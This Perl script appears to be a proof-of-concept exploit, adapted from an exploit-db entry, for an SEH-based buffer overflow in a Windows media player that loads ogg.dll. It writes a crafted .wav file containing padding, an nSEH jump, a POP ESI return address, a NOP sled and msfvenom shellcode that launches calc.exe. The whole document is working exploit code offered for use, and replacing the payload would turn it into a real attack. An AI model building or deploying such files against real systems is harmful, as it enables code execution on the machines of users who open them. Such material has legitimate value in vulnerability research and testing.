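#!/usr/bin/env perl
# Original p0c: https://www.exploit-db.com/exploits/36465/
# Credit to TUNISIAN CYBER.
# Author's notes (kept as written, typos aside):
#   however he was attempting to vanilla buffer overflow;
#   in fact it is SEH based exploit;
#   using the address 0x7C9D30D7 is limit the targets,
#   which I assume belongs to OS file, didn't work on win7;
#   yes he did find a buffer overflow since the offset reaches ESP before SEH;
#   in this app, SEH based exploits are more effective and the main vuln
#   in this case should be SEH;
#   This p0c > win 7s & 8s
# ThreatActor at CoreRed.com
#
# This script only writes the proof-of-concept .wav file to disk; it executes
# nothing. Every byte written comes from the constants declared below.
use strict;
use warnings;

my $file = "p0c.wav";

# Padding up to the SEH record (author's offset).
my $buff = "A" x 4116;

# nSEH bytes; the author's comment reads "dat 8 jmp".
my $nseh = "\xeb\x06\xff\xff";

# SEH: 0x66E42A79 is "POP ESI" in ogg.dll per the author; pack 'V' emits it
# as an unsigned 32-bit little-endian value.
my $seh = pack('V', 0x66E42A79);

my $nop = "\x90" x 28;

# msfvenom -p windows/exec CMD=calc.exe -f perl -b '\x00\xff\x0a\x0d'
my $shell = "\xda\xcd\xd9\x74\x24\xf4\xb8\x50\x99\x22\x39\x5b\x33\xc9"
    . "\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x44\x7b\xd7\xc5"
    . "\x8c\xf9\x18\x36\x4c\x9e\x91\xd3\x7d\x9e\xc6\x90\x2d\x2e"
    . "\x8c\xf5\xc1\xc5\xc0\xed\x52\xab\xcc\x02\xd3\x06\x2b\x2c"
    . "\xe4\x3b\x0f\x2f\x66\x46\x5c\x8f\x57\x89\x91\xce\x90\xf4"
    . "\x58\x82\x49\x72\xce\x33\xfe\xce\xd3\xb8\x4c\xde\x53\x5c"
    . "\x04\xe1\x72\xf3\x1f\xb8\x54\xf5\xcc\xb0\xdc\xed\x11\xfc"
    . "\x97\x86\xe1\x8a\x29\x4f\x38\x72\x85\xae\xf5\x81\xd7\xf7"
    . "\x31\x7a\xa2\x01\x42\x07\xb5\xd5\x39\xd3\x30\xce\x99\x90"
    . "\xe3\x2a\x18\x74\x75\xb8\x16\x31\xf1\xe6\x3a\xc4\xd6\x9c"
    . "\x46\x4d\xd9\x72\xcf\x15\xfe\x56\x94\xce\x9f\xcf\x70\xa0"
    . "\xa0\x10\xdb\x1d\x05\x5a\xf1\x4a\x34\x01\x9f\x8d\xca\x3f"
    . "\xed\x8e\xd4\x3f\x41\xe7\xe5\xb4\x0e\x70\xfa\x1e\x6b\x8e"
    . "\xb0\x03\xdd\x07\x1d\xd6\x5c\x4a\x9e\x0c\xa2\x73\x1d\xa5"
    . "\x5a\x80\x3d\xcc\x5f\xcc\xf9\x3c\x2d\x5d\x6c\x43\x82\x5e"
    . "\xa5\x20\x45\xcd\x25\x89\xe0\x75\xcf\xd5";

# The original used a two-arg open on an undeclared global handle with no
# error checking. Use the three-arg form with a lexical handle, set binmode
# so the raw payload bytes are written untranslated on every platform, and
# check each step (buffered write errors only surface at close).
open my $fh, '>', $file or die "open $file: $!";
binmode $fh or die "binmode $file: $!";
print {$fh} $buff . $nseh . $seh . $nop . $shell or die "write $file: $!";
close $fh or die "close $file: $!";

print "+++++++++++++++++++\n";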